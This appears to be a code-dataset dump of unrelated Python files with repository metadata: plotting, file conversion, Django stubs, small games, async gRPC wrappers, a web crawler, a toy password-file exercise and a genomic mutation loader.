ax1.set_ylabel(r'$P(k)$ [Mpc/$h$]$^3$')
ax1.set_xlabel(r'$k$ [$h$/Mpc]')
ax1.xaxis.set_major_formatter(FormatStrFormatter('%2.2f'))
ax1.plot(k,P+P_spt, label=r'$P_{lin} + P_{SPT}$', color='black')
def plot_galaxy_power(b1,b2,bs):
P_g = galaxy_power(b1,b2,bs)
mylabel = r'$P_g(b_1={}, b_2={}, b_s={})$'.format(b1,b2,bs)
color = next(ax1._get_lines.prop_cycler)['color']
ax1.plot(k,P_g, label=mylabel, color=color)
ax1.plot(k,-P_g, '--', label=None, alpha=.5, color=color)
plot_galaxy_power(1.5, 0., -0.1)
plot_galaxy_power(1.5, 0., 0.1)
plot_galaxy_power(1.5, 0.1, 0.)
plot_galaxy_power(1.5, -0.1, 0.)
plt.grid()
plt.legend(loc='best')
plt.tight_layout()
fig.savefig('galaxy_bias.pdf')
## plot correlation functions
def plot_galaxy_correlation_fftlog(b1,b2,bs):
P_g = galaxy_power(b1,b2,bs)
r, xi_gg = xi_fftlog(k,P_g)
mylabel = r'$\xi_g(b_1={}, b_2={}, b_s={})$'.format(b1,b2,bs)
color = next(ax._get_lines.prop_cycler)['color']
ax.plot(r, xi_gg, label=mylabel, color=color)
ax.plot(r, -xi_gg, '--', label=None, color=color, alpha=.5)
fig = plt.figure()
ax = fig.add_subplot(111)
ax.set_xscale('log')
ax.set_yscale('log')
ax.set_xlabel(r'$r$ [Mpc/$h$]')
ax.set_ylabel(r'$\xi(r)$')
r, xi_mm = xi_fftlog(k,P+P_spt)
ax.plot(r, xi_mm, label=r'matter (SPT)', color='black')
plot_galaxy_correlation_fftlog(1.5, 0., -0.1)
plot_galaxy_correlation_fftlog(1.5, 0., 0.1)
plot_galaxy_correlation_fftlog(1.5, 0.1, 0.)
plot_galaxy_correlation_fftlog(1.5, -0.1, 0.)
plt.legend(loc='best')
plt.grid()
plt.tight_layout()
fig.savefig('xi_gg_fftlog.pdf')
## plot (bin-averaged) correlation functions
P_g_linear = galaxy_power(1.5, 0., 0.)
r, xi_gg_linear = xi_simple_binaverage(k,P_g_linear)
def plot_galaxy_correlation_binavg(b1,b2,bs):
P_g = galaxy_power(b1,b2,bs)
r, xi_gg = xi_simple_binaverage(k,P_g)
mylabel = r'$\xi_g(b_1={}, b_2={}, b_s={})$'.format(b1,b2,bs)
color = next(ax._get_lines.prop_cycler)['color']
ax.plot(r, xi_gg/xi_gg_linear, label=mylabel, color=color)
# ax.plot(r, xi_gg, label=mylabel, color=color)
fig = plt.figure()
ax = fig.add_subplot(111)
ax.set_xscale('log')
#ax.set_yscale('log')
ax.set_xlabel(r'$r$ [Mpc/$h$]')
ax.set_ylabel(r'$\xi(r)$')
#r, xi_mm = xi_simple_binaverage(k,P+P_spt)
#ax.plot(r, xi_mm, label=r'matter (SPT)', color='black')
#plot_galaxy_correlation_binavg(1.5, 0., -0.2)
#plot_galaxy_correlation_binavg(1.5, 0., -0.1)
#plot_galaxy_correlation_binavg(1.5, 0., 0.1)
#plot_galaxy_correlation_binavg(1.5, 0., 0.2)
plot_galaxy_correlation_binavg(1.5, 0.3, 0.)
plot_galaxy_correlation_binavg(1.5, 0.2, 0.)
plot_galaxy_correlation_binavg(1.5, 0.1, 0.)
plot_galaxy_correlation_binavg(1.5, -0.1, 0.)
plot_galaxy_correlation_binavg(1.5, -0.2, 0.)
plot_galaxy_correlation_binavg(1.5, -0.3, 0.)
plt.legend(loc='best')
plt.grid()
plt.tight_layout()
fig.savefig('xi_gg_binavg.pdf')
| [
"[email protected]"
] | |
655211170d6d0d6bfb67500f2af458a29613249a | 617d3e94e2a30024cd4570ee4f7eec89914d9e47 | /data_analysis_byPro/Day10-05.py | 8cceeeea2f20a129d48b1928155cefb91176a813 | [
"MIT"
] | permissive | yunjung-lee/class_python_data | 5d29fdbc20926de84340ca88c7677c1f3ac03b7c | 67ceab73e67ec63d408894a6ab016a8d25a4e30b | refs/heads/master | 2020-04-02T09:44:59.674102 | 2018-11-09T10:02:21 | 2018-11-09T10:02:21 | 154,307,806 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 684 | py | # Raw --> CSV
import os
import math
import csv
input_file = 'D:\\images\\Pet_RAW\\Pet_RAW(64x64)\\cat02_64.raw'
output_file = 'D:\\images\\csv\\cat02_64.csv'
header = ['Column', 'Row', 'Value']
with open(input_file, 'rb') as filereader :
with open(output_file, 'w', newline='') as filewriter :
csvWriter = csv.writer(filewriter)
csvWriter.writerow(header)
fsize = os.path.getsize(input_file)
XSIZE = YSIZE = int(math.sqrt(fsize))
for row in range(XSIZE) :
for col in range(YSIZE) :
data = int(ord(filereader.read(1)))
row_list = [col, row, data]
csvWriter.writerow(row_list)
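# Editor's note (addition): XSIZE = YSIZE = sqrt(filesize) assumes a square,
# 8-bit grayscale RAW image (here 64x64 = 4096 bytes); each byte becomes one
# (Column, Row, Value) record in the CSV.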
| [
"[email protected]"
] | |
ed41098c79405444ae759362688d2c5fc651be15 | 187e868f562315dd512059a2a582d75311b048d9 | /realeaccounting/models.py | ffd751eae946db4b306c8d505243645ab50ae1b9 | [] | no_license | praveenchouhan411/realeaccounting_repo | 9738133e2fb7ce103b260af952969cff3ffb2bd4 | 206c0985e8cd2d9b860088d8c1f679bd7c80e53c | refs/heads/master | 2021-08-28T10:48:36.084283 | 2017-12-12T01:32:26 | 2017-12-12T01:32:26 | 113,926,130 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 506 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models
# Create your models here.
#from django.db import models
#from django import forms
"""
class EmailForm(forms.Form):
firstname = forms.CharField(max_length=255)
lastname = forms.CharField(max_length=255)
email = forms.EmailField()
subject = forms.CharField(max_length=255)
botcheck = forms.CharField(max_length=5)
message = forms.CharField()
"""
| [
"[email protected]"
] | |
4d55ef499a5b486d7757c607457efe537ae426e1 | e50d5d22ba46f17097d5dc86d12ec9d247929468 | /python/kwiver/arrows/core/__init__.py | ef15bfd25ed58f26153ecceff0b3af1098131b32 | [
"BSD-3-Clause"
] | permissive | nrsyed/kwiver | 488a0495b8c3b523f6639669aff73931373d4ca4 | 990a93b637af06129a842be38b88908df358761b | refs/heads/master | 2023-02-25T20:22:10.813154 | 2021-01-21T16:51:23 | 2021-01-21T16:51:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 33 | py | from kwiver.arrows.core import *
| [
"[email protected]"
] | |
b9d3d1bb617ba001b6cd6d980b8eb69d8968f7a6 | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_125/ch131_2020_04_01_17_27_45_688490.py | 1747626a11ca0c61d555ae4650a131458602343e | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 907 | py | import random
a=int(input('tell me a number '))
b=int(input('tell me another number'))
soma1= a+b
dado1 =random.randint(1,10)
dado2 = random.randint(1,10)
soma2= dado1+dado2
dinheiros = 10
if soma2<a:
    print('Sum is higher')
elif soma2>b:
    print('Sum is lower')
elif soma2==soma1:
    print('Sum is in the middle')
print ('you have 10 coins')
c=int(input('how many guesses do you want to make ?'))
chutes =c
dinheiros = int(dinheiros-chutes)
jogo=True
while chutes>0:
    d=int(input('Which number do you think it is'))
    chutes -=1
    if d==soma2:
        print('you won')
        dinheiros= (dinheiros-chutes)+(dinheiros-chutes)*5
        print ('You finished the game with '+ str(dinheiros))
        jogo=False
    else:
        print('you lost')
    if chutes==0:
        print ('your guesses ran out')
        print ('You finished the game with '+ str(dinheiros)+ ' coins')
        jogo=False
| [
"[email protected]"
] | |
ee41c189f6e2744c2bda1052b1c5c459b8f1b904 | d9b9169f26e2af20498551d78532550e2ed8996c | /script.py | 7880e4a3cd251e4ea6c1941c552abce067d80ff1 | [
"MIT"
] | permissive | SenayYakut/The-Fender | d64d11f17fc8f29aa06ad807668f4fe5e30767c8 | 73eef831f794da8f9476a61b46cf2122255d3300 | refs/heads/main | 2023-02-13T02:40:39.931220 | 2021-01-04T21:22:37 | 2021-01-04T21:22:37 | 326,808,759 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,292 | py | import csv
import json
compromised_users = []
with open("passwords.csv") as password_file:
password_csv = csv.DictReader(password_file)
for password_row in password_csv:
compromised_users.append(password_row["Username"])
with open("compromised_users.txt", "w") as compromised_user_file:
for compromised_user in compromised_users:
        compromised_user_file.write(compromised_user + "\n")  # one username per line
with open("boss_message.json", "w") as boss_message:
boss_message_dict={"recipient":"The Boss", "message":"Mission Success"}
json.dump(boss_message_dict, boss_message)
with open("new_passwords.csv", "w") as new_passwords_obj:
slash_null_sig = """
_ _ ___ __ ____
/ )( \ / __) / \(_ _)
) \/ ( ( (_ \( O ) )(
\____/ \___/ \__/ (__)
_ _ __ ___ __ _ ____ ____
/ )( \ / _\ / __)( / )( __)( \
) __ (/ \( (__ ) ( ) _) ) D (
\_)(_/\_/\_/ \___)(__\_)(____)(____/
____ __ __ ____ _ _
___ / ___)( ) / _\ / ___)/ )( \
(___) \___ \/ (_/\/ \\___ \) __ (
(____/\____/\_/\_/(____/\_)(_/
__ _ _ _ __ __
( ( \/ )( \( ) ( )
/ /) \/ (/ (_/\/ (_/\
\_)__)\____/\____/\____/
"""
new_passwords_obj.write(slash_null_sig)
| [
"[email protected]"
] | |
8566fa992f8319c8dafcaf3b9d186e200769bc79 | bb2bd493a268e3ebfbb23167d5f38a1281bbf3b0 | /venv/lib/python3.7/site-packages/aiogrpc/utils.py | 36644ade5638b98ba20860e9c2374bdf0888b9bb | [] | no_license | EDD-Phoenix-Technologies/EDDMAVLink | ba33182c953628d620cf4dde1f81b430b2c3dcd8 | 55f3882b21c282324986f28315e4b37bbacee2ea | refs/heads/master | 2020-08-29T18:46:44.866677 | 2019-12-18T21:09:49 | 2019-12-18T21:09:49 | 218,134,620 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,467 | py | '''
Created on 2017/8/14
:author: hubo
'''
import asyncio
import functools
import queue
from asyncio.futures import CancelledError
def wrap_callback(callback, loop):
@functools.wraps(callback)
def _callback(*args, **kwargs):
if not loop.is_closed():
loop.call_soon_threadsafe(functools.partial(callback, *args, **kwargs))
return _callback
def wrap_active_test(func, test, loop, executor=None):
@functools.wraps(func)
async def _func(*args, **kwargs):
if test():
return await loop.run_in_executor(executor, functools.partial(func, *args, **kwargs))
else:
return func(*args, **kwargs)
return _func
def wrap_future(grpc_fut, loop):
fut_ = loop.create_future()
def _set_state(grpc_fut, fut_):
assert grpc_fut.done()
if fut_.cancelled():
return
assert not fut_.done()
if grpc_fut.cancelled():
fut_.cancel()
else:
exception = grpc_fut.exception()
if exception is not None:
fut_.set_exception(exception)
else:
result = grpc_fut.result()
fut_.set_result(result)
def _call_check_cancel(fut_):
if fut_.cancelled():
grpc_fut.cancel()
def _call_set_state(grpc_fut):
if not loop.is_closed():
loop.call_soon_threadsafe(_set_state, grpc_fut, fut_)
fut_.add_done_callback(_call_check_cancel)
grpc_fut.add_done_callback(_call_set_state)
return fut_
def copy_members(source, dest, member_list, wrapper=None):
for m in member_list:
f = getattr(source, m, None)
if f is None:
continue
if wrapper is not None:
f = wrapper(f)
setattr(dest, m, f)
def wrap_future_call(grpc_fut, loop, executor=None):
fut_ = wrap_future(grpc_fut, loop)
# Copy extra members
copy_members(grpc_fut, fut_,
['is_active',
'time_remaining'])
@functools.wraps(grpc_fut.add_callback)
def _add_callback(callback):
grpc_fut.add_callback(wrap_callback(callback, loop))
fut_.add_callback = _add_callback
copy_members(grpc_fut, fut_,
['initial_metadata',
'trailing_metadata',
'code',
'details'],
functools.partial(wrap_active_test, test=grpc_fut.is_active, loop=loop, executor=executor))
return fut_
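# Hedged usage sketch (``stub`` and ``Request`` are placeholders, not part of
# this module): a unary gRPC call future becomes awaitable once wrapped:
#
#     grpc_fut = stub.UnaryCall.future(Request())
#     result = await wrap_future_call(grpc_fut, asyncio.get_event_loop())
#
# Cancelling the returned asyncio future propagates to the underlying gRPC
# future through the done callback installed in wrap_future.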
class WrappedIterator(object):
"""
    Wraps a blocking gRPC response iterator into an async iterator.
"""
def __init__(self, grpc_iterator, loop, executor=None, stream_executor=None):
self._iterator = grpc_iterator
self._loop = loop
self._executor = executor
if stream_executor is None:
self._shared_executor = True
self._stream_executor = executor
else:
self._shared_executor = False
self._stream_executor = stream_executor
self._next_future = None
copy_members(grpc_iterator, self,
['is_active',
'time_remaining',
'cancel'])
@functools.wraps(grpc_iterator.add_callback)
def _add_callback(callback):
grpc_iterator.add_callback(wrap_callback(callback, loop))
self.add_callback = _add_callback
copy_members(grpc_iterator, self,
['initial_metadata',
'trailing_metadata',
'code',
'details'],
functools.partial(wrap_active_test, test=grpc_iterator.is_active, loop=loop, executor=executor))
def __aiter__(self):
return self
def _next(self):
if self._iterator is None:
raise StopAsyncIteration
try:
return next(self._iterator)
except StopIteration:
raise StopAsyncIteration
except Exception:
raise
async def __anext__(self):
if self._next_future is None:
if self._iterator is None:
raise StopAsyncIteration
self._next_future = self._loop.run_in_executor(self._stream_executor, self._next)
try:
return await asyncio.shield(self._next_future, loop=self._loop)
finally:
if self._next_future and self._next_future.done():
self._next_future = None
def __del__(self):
if self._iterator is not None:
self.cancel()
self._iterator = None
if self._next_future is not None:
if not self._loop.is_closed():
self._loop.call_soon_threadsafe(lambda f=self._next_future: f.cancel())
self._next_future = None
if not self._shared_executor and self._stream_executor is not None:
self._stream_executor.shutdown()
self._stream_executor = None
async def aclose(self):
self.__del__()
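# Hedged usage sketch (``stub``, ``Request`` and ``handle`` are placeholders):
# a server-streaming call can be consumed with ``async for`` once wrapped,
# because __anext__ runs the blocking next() call in an executor:
#
#     it = WrappedIterator(stub.ServerStreamingCall(Request()), loop)
#     async for message in it:
#         handle(message)
#     await it.aclose()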
class IteratorScope(object):
def __init__(self, _iter):
self._iter = _iter
async def __aenter__(self):
return self._iter
async def __aexit__(self, exc_val, exc_typ, exc_tb):
await self._iter.aclose()
class WrappedAsyncIterator(object):
"""
    Wraps an async iterator into a blocking iterator that gRPC can consume as a request stream.
"""
def __init__(self, async_iter, loop):
self._async_iter = async_iter
self._loop = loop
self._q = queue.Queue()
self._stop_future = loop.create_future()
self._next_future = None
self._closed = False
def __iter__(self):
return self
async def _next(self):
if self._async_iter is None:
# An edge condition
self._q.put((None, True))
return
if self._next_future is None:
self._next_future = asyncio.ensure_future(self._async_iter.__anext__(), loop=self._loop)
try:
done, _ = await asyncio.wait([self._stop_future, self._next_future], loop=self._loop,
return_when=asyncio.FIRST_COMPLETED)
if self._stop_future in done:
self._q.put((await self._stop_future, True))
self._next_future.cancel()
try:
await self._next_future
except CancelledError:
pass
finally:
self._next_future = None
else:
nf = self._next_future
self._next_future = None
self._q.put((await nf, False))
except StopAsyncIteration:
self._q.put((None, True))
except Exception as exc:
self._q.put((exc, True))
def __next__(self):
if self._async_iter is None:
raise StopIteration
try:
r, is_exc = self._q.get_nowait()
except queue.Empty:
if not self._loop.is_closed():
self._loop.call_soon_threadsafe(functools.partial(asyncio.ensure_future, self._next(), loop=self._loop))
r, is_exc = self._q.get()
if is_exc:
if r is None:
self._async_iter = None
raise StopIteration
else:
raise r
else:
return r
def close(self):
if self._async_iter is not None:
async def async_close():
if not self._stop_future.done():
self._stop_future.set_result(None)
await self._async_iter.aclose()
try:
if not self._loop.is_closed():
self._loop.call_soon_threadsafe(functools.partial(asyncio.ensure_future, async_close(), loop=self._loop))
finally:
# Ensure __next__ ends
self._q.put((None, True))
self._async_iter = None
def cancel(self, exception=True):
if exception:
exc = CancelledError()
else:
exc = None
def _set_result():
if not self._stop_future.done():
self._stop_future.set_result(exc)
# Ensure __next__ ends. Sometimes the loop is already closing, so the exit result may not be written
# to the queue
self._q.put((exc, True))
if not self._loop.is_closed():
self._loop.call_soon_threadsafe(_set_result)
| [
"[email protected]"
] | |
f9d41f245e77585a9706f05b7d71b832f102caea | 52b5773617a1b972a905de4d692540d26ff74926 | /.history/binarySearchTree_20200615162637.py | a9977b630993eb4c07314b2e1ce2897670babb9a | [] | no_license | MaryanneNjeri/pythonModules | 56f54bf098ae58ea069bf33f11ae94fa8eedcabc | f4e56b1e4dda2349267af634a46f6b9df6686020 | refs/heads/master | 2022-12-16T02:59:19.896129 | 2020-09-11T12:05:22 | 2020-09-11T12:05:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 23 | py | def search(list):
    pass  # incomplete editor-history snapshot: the function body was never written
| [
"[email protected]"
] | |
438b13034d8746638556d5557ff9f5143b7c96a6 | 32d67615b646b5917618abcb2efc93fea222fb76 | /day01_vscode/gui/numberGameGuiVersion.py | 48a6d4bd91e575fe45ac7aa9a80fd01a2b3effb5 | [] | no_license | jihazard/python | 449ef551a42e4874d1b9d82f27ba759122ae11a3 | 0991d7e1299aea6a77edb59a765bc13ced915864 | refs/heads/master | 2020-05-24T13:44:10.475777 | 2019-06-08T09:05:23 | 2019-06-08T09:05:23 | 187,295,472 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 598 | py | import easygui
import random
num = 0
times = 6
answer = random.randint(1, 100)
while num != answer and times > 0:
    num = easygui.integerbox("Enter a number between 1 and 100. Chances left = " + str(times))
    if num < answer:
        easygui.msgbox(str(num) + " is lower than the answer.")
    elif num > answer:
        easygui.msgbox(str(num) + " is higher than the answer.")
    times -= 1
if num == answer:
    easygui.msgbox("Correct! The answer is {}.".format(answer))
else:
    easygui.msgbox("You failed. The answer was {}.".format(answer)) | [
"[email protected]"
] | |
7624925bba586dba65beb5197b61c0b90b99d6c7 | 8e6c2a485a86cbb5978f2976295223f1e04f8385 | /src/search/views.py | 45b79959e1891c6a5620bdbf49e368791fa69a98 | [] | no_license | sergiopassos/ecommerce_django | a97d6061a555b86205a713fd3ccb220633925be3 | 2c1a9e028f06fedf77723dc6efd518ed7163f912 | refs/heads/master | 2020-05-03T12:27:36.406835 | 2019-06-01T00:23:29 | 2019-06-01T00:23:29 | 178,626,811 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 664 | py | from django.shortcuts import render
from django.views.generic import ListView
from products.models import Product
class SearchProductView(ListView):
template_name = "search/view.html"
def get_context_data(self, *args, **kwargs):
context = super(SearchProductView, self).get_context_data(*args, **kwargs)
query = self.request.GET.get('q')
context['query'] = query
return context
def get_queryset(self, *args, **kwargs):
request = self.request
# print(request.GET)
method_dict = request.GET
query = method_dict.get('q', None)
print(query)
if query is not None:
return Product.objects.search(query)
return Product.objects.featured()
| [
"[email protected]"
] | |
9eed5071f02d5d89a6660a17d90a867d9199273d | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/21/usersdata/134/8920/submittedfiles/exercicio24.py | 71f81edc38a08d14b4e3846712511d689d38c81c | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 262 | py | # -*- coding: utf-8 -*-
from __future__ import division
import math
a = int(input('Enter the value of a: '))
b = int(input('Enter the value of b: '))
if a > b:
    i = a
else:
    i = b
while i > 0:
    if a % i == 0 and b % i == 0:
        print(i)
        break
    i = i - 1
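# The loop above is a brute-force greatest-common-divisor search: it walks
# down from max(a, b) until it hits a common divisor. For comparison only,
# Euclid's algorithm finds the same value in O(log min(a, b)) steps; gcd()
# below is an illustrative helper, not part of the original exercise.
def gcd(x, y):
    while y:
        x, y = y, x % y
    return x
# print(gcd(a, b))  # would print the same value as the loop above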
| [
"[email protected]"
] | |
4e75c82e10fbb1fea6eade40fef334197dc7c816 | ccc6350955af98c02207e070d2a8c3f861d8c8f6 | /src/Spider.py | 6417e9eaf147ba2ec24a6ec22607ebcd20194a5d | [
"MIT"
] | permissive | harry363/Crawler | 0fc8ba40e4605ee301dc8b2b494fc990f74fabe1 | 90f42cf5fe3a8df52d2e0106fbae3dbc70b316f8 | refs/heads/master | 2020-08-27T11:56:34.639229 | 2019-10-24T13:30:22 | 2019-10-24T13:30:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,322 | py | from urllib.request import urlopen
from link_finder import LinkFinder
from general import *
class Spider:
# class variables (shared among all instances)
project_name = ''
base_url = ''
domain_name = ''
queue_file = ''
crawled_file = ''
queue = set()
crawled = set()
def __init__(self, project_name, base_url, domain_name):
Spider.project_name = project_name
Spider.base_url = base_url
Spider.domain_name = domain_name
Spider.queue_file = project_name + '/queue.txt'
Spider.crawled_file = project_name + '/crawled.txt'
self.boot()
self.crawl_page('FirstSpider', Spider.base_url)
@staticmethod
def boot():
create_project_dir(Spider.project_name)
create_data_files(Spider.project_name, Spider.base_url)
Spider.queue = file_to_set(Spider.queue_file)
Spider.crawled = file_to_set(Spider.crawled_file)
@staticmethod
def crawl_page(thread_name, page_url):
if page_url not in Spider.crawled:
print(thread_name + ' now crawling ' + page_url)
print('Queue ' + str(len(Spider.queue)) + ' | Crawled ' + str(len(Spider.crawled)))
Spider.add_links_to_queue(Spider.gather_links(page_url))
Spider.queue.remove(page_url)
Spider.crawled.add(page_url)
Spider.update_files()
@staticmethod
def gather_links(page_url):
html_string = ''
try:
response = urlopen(page_url)
            if response.getheader('Content-Type', '').startswith('text/html'):
html_bytes = response.read()
html_string = html_bytes.decode("utf-8")
finder = LinkFinder(Spider.base_url, page_url)
finder.feed(html_string)
        except Exception:
return set()
return finder.page_links()
@staticmethod
def add_links_to_queue(links):
for url in links:
if url in Spider.queue:
continue
if url in Spider.crawled:
continue
if Spider.domain_name not in url:
continue
Spider.queue.add(url)
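    # Hedged usage sketch (assumes general.py provides create_project_dir,
    # create_data_files, file_to_set and set_to_file, as imported above):
    #
    #     Spider('myproject', 'https://example.com/', 'example.com')
    #     while Spider.queue:
    #         Spider.crawl_page('worker-1', Spider.queue.pop())
    #
    # Because all state lives in class variables, every instance shares one
    # queue and one crawled set.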
@staticmethod
def update_files():
set_to_file(Spider.queue, Spider.queue_file)
set_to_file(Spider.crawled, Spider.crawled_file) | [
"[email protected]"
] | |
de3288081330c0008e1d1259e27e28d6408fa959 | 34570e32855109a3e0dd41ac760098bd230dc65e | /mmmvi/lib/load_data.py | 135da604afa46a0b46c1c394d93493973af8455a | [
"MIT"
] | permissive | melohar/voc-identify | 55520cb291d1faa8ffb19f98970609b9dd01f0de | f98ec3b2f1c6ce687953cca9cb9ccdaea20ac3a5 | refs/heads/main | 2023-08-04T15:48:27.205038 | 2021-09-09T17:08:19 | 2021-09-09T17:08:19 | 404,818,227 | 1 | 0 | MIT | 2021-09-09T17:49:54 | 2021-09-09T17:49:54 | null | UTF-8 | Python | false | false | 9,009 | py | import itertools
import logging
import re
import string
import yaml
from pathlib import Path
from typing import List, Tuple
import pandas as pd
import pysam
from mmmvi.lib.types import VoCs, Reads, Mutations
def load_mutations(
mutations_path: Path,
reference_path: Path,
voc_col: str,
mut_col: str,
delimiter: str,
selected_vocs: List[str],
) -> VoCs:
# Decides whether to load variant definitions from a tabular file or from a directory
# containing Public Health England-formatted YAML files.
#
# If the path provided by the --mutations command line argument is a file,
# load_tabular_mutations is attempted. If the path instead refers to a directory,
# load_mutations_phe is attempted.
if mutations_path.is_file():
vocs = load_tabular_mutations(
mutations_path, reference_path, voc_col, mut_col, delimiter, selected_vocs
)
elif mutations_path.is_dir() and list(mutations_path.glob("*.yml")):
vocs = load_mutations_phe(mutations_path, reference_path, selected_vocs)
else:
msg = f"Error: {mutations_path} does not appear to be a readable file or a directory containing .yml files"
raise FileNotFoundError(msg)
return vocs
def load_reference(reference: Path) -> str:
# Loads the FASTA-formatted reference genome
#
# The reference genome *must* be a single complete sequence
# in FASTA format
lines = []
with reference.open("r") as f:
for line in f:
if not line.startswith(">"):
lines.append(line.strip())
seq = "".join(lines)
return seq
def parse_mutation(s: str):
# Parses the mutation string from the mutations file
#
# The mutation string can be in one of 4 formats:
# A123T # point substitution
# CAT123GTA # multiple base substitution
# [123-125]del # deletion
# 123CAT # insertion
if s.endswith("del"):
position_range, wt, mutation = parse_deletion(s)
elif s[0] in string.ascii_uppercase:
position_range, wt, mutation = parse_substitution(s)
else:
position_range, wt, mutation = parse_insertion(s)
return position_range, wt, mutation
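# Worked examples of the dispatch above (values follow from the parsers
# below; positions are 0-based):
#   parse_mutation("A123T")        -> ((122,), ("A",), ("T",))
#   parse_mutation("[123-125]del") -> ((122, 123, 124), (None,), (None, None, None))
#   parse_mutation("123CAT")       -> ((122, None, 123), (None, None, None), ("C", "A", "T"))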
def parse_deletion(s: str):
# [123-125]del means that reference positions 123, 124, and 125 are deleted in the read
_, *start_stop, _ = re.split(r"[\[\-\]]", s)
try:
start, stop = start_stop
except ValueError:
start = stop = start_stop[0]
    start = int(start)
    stop = int(stop)
    if stop < start:
        raise ValueError(f"stop is less than start in {s}")
position_range = tuple(range(start - 1, stop))
mutation = tuple(None for _ in position_range)
wt = (None,)
return position_range, wt, mutation
def parse_substitution(s: str):
# A123T means A in the reference has been substituted by T in read
# CAT123GTA means C, A, T at positions 123, 124, 125 have been substituted by G, T, A
wt, mutation = (tuple(x) for x in re.findall(r"[ATCG]+", s))
if len(wt) != len(mutation):
wt_str = "".join(wt)
mut_str = "".join(mutation)
raise ValueError(
f"Mismatch between length of wild type '{wt_str}' and mutant '{mut_str}' in '{s}'"
)
start = int(re.search(r"\d+", s).group()) - 1
position_range = tuple(range(start, start + len(wt)))
return position_range, wt, mutation
def parse_insertion(s: str):
# 123CAT indicates CAT has been inserted betwixt reference positions 123 and 124
position = int("".join(itertools.takewhile(lambda x: x in string.digits, s)))
# Exactly 1 None will get the whole insertion by exploiting pd.Series indexing
position_range = (position - 1, None, position)
mutation = tuple("".join(itertools.dropwhile(lambda x: x in string.digits, s)))
wt = tuple(None for _ in mutation)
return position_range, wt, mutation
def load_tabular_mutations(
mutations_path: Path,
reference_path: Path,
voc_col: str,
mut_col: str,
delimiter: str,
selected_vocs: List[str],
) -> VoCs:
# Loads the mutations file
#
# The mutations file is a tabular delimited file, which must
# contain at least the following two columns, with other
# columns ignored:
# 1) a column containing the names of each variant (voc_col)
# 2) a column containing the mutation strings (mut_col)
data = pd.read_csv(mutations_path, sep=delimiter)
reference_seq = load_reference(reference_path)
vocs = {"reference": {}}
for idx, row in data.iterrows():
voc = row[voc_col]
if selected_vocs and voc not in selected_vocs:
continue
mutation_string = row[mut_col].strip()
try:
position_range, wt, mutant = parse_mutation(mutation_string)
# catch *all* exceptions from parsing,
# because any problems here should stop the program
except Exception:
msg = f"Invalid mutation string: '{mutation_string}'"
raise InvalidMutation(msg)
if voc not in vocs:
vocs[voc] = {}
try:
vocs[voc][position_range].add(mutant)
except KeyError:
vocs[voc][position_range] = {mutant}
if wt == (None,):
wt = tuple(reference_seq[position] for position in position_range)
vocs["reference"][position_range] = [wt]
return vocs
def load_mutations_phe(
mutations_dir: Path, reference_path: Path, selected_vocs: List[str]
) -> VoCs:
# Manages loading variant definitions from a directory full of YAML files
# using the schema described by https://github.com/phe-genomics/variant_definitions/
vocs = {"reference": {}}
# the spec explicitly states the extension will be .yml, and so we can rely on it
variant_files = mutations_dir.glob("*.yml")
for variant in variant_files:
voc = variant.stem # per the spec, the file name matches its 'unique-id' value
reference, mutations = load_variant_from_phe_yaml(variant, reference_path)
if selected_vocs and voc not in selected_vocs:
continue
vocs["reference"].update(reference)
vocs[voc] = mutations
return vocs
def load_variant_from_phe_yaml(
yaml_variant: Path, reference_path: Path
) -> Tuple[Mutations, Mutations]:
# Loads VOC signature mutations from a YAML file using
# Public Health England's format for SARS-CoV-2 variants:
# https://github.com/phe-genomics/variant_definitions/
reference = {}
voc = {}
data = yaml.safe_load(yaml_variant.read_text())
reference_seq = load_reference(reference_path)
for mutation in data["variants"]:
start = mutation["one-based-reference-position"] - 1
if mutation["type"] == "SNP":
wt = (mutation["reference-base"],)
mutant = (mutation["variant-base"],)
position_range = (start,)
elif mutation["type"] == "MNP":
wt = tuple(mutation["reference-base"])
mutant = tuple(mutation["variant-base"])
position_range = tuple(range(start, start + len(wt)))
elif mutation["type"] == "insertion":
mutant = tuple(mutation["variant-base"][1:])
wt = tuple(None for _ in mutant)
position_range = (start, None, start + 1)
elif mutation["type"] == "deletion":
position_range = tuple(
range(start, start + len(mutation["reference-base"]) - 1)
)
wt = (None,)
mutant = tuple(None for _ in position_range)
else:
msg = "Mutation type '{}' is not implemented".format(mutation["type"])
raise NotImplementedError(msg)
if wt == (None,):
wt = tuple(reference_seq[position] for position in position_range)
try:
voc[position_range].add(mutant)
except KeyError:
voc[position_range] = {mutant}
reference[position_range] = [wt]
return reference, voc
def load_reads(reads_path: Path, ref_path: Path) -> Reads:
# Loads reads from a BAM file on disk and returns the unique reads.
#
# The the sequence is used as the key. The dictionary keeps track of the
# set of read names which share that sequence, as well as a representative
# pysam.AlignedSegment object
logging.info(f"Loading reads from {reads_path}")
reads = {}
with pysam.AlignmentFile(reads_path, reference_filename=str(ref_path)) as readsfile:
for read in readsfile:
seq = read.query_sequence
orientation_tag = "rev" if read.is_reverse else "fwd"
read_name = f"{read.query_name}:{orientation_tag}"
try:
reads[seq]["reads"].add(read_name)
except KeyError:
reads[seq] = {"reads": {read_name}, "read_obj": read}
return reads
class InvalidMutation(Exception):
pass
| [
"[email protected]"
] | |
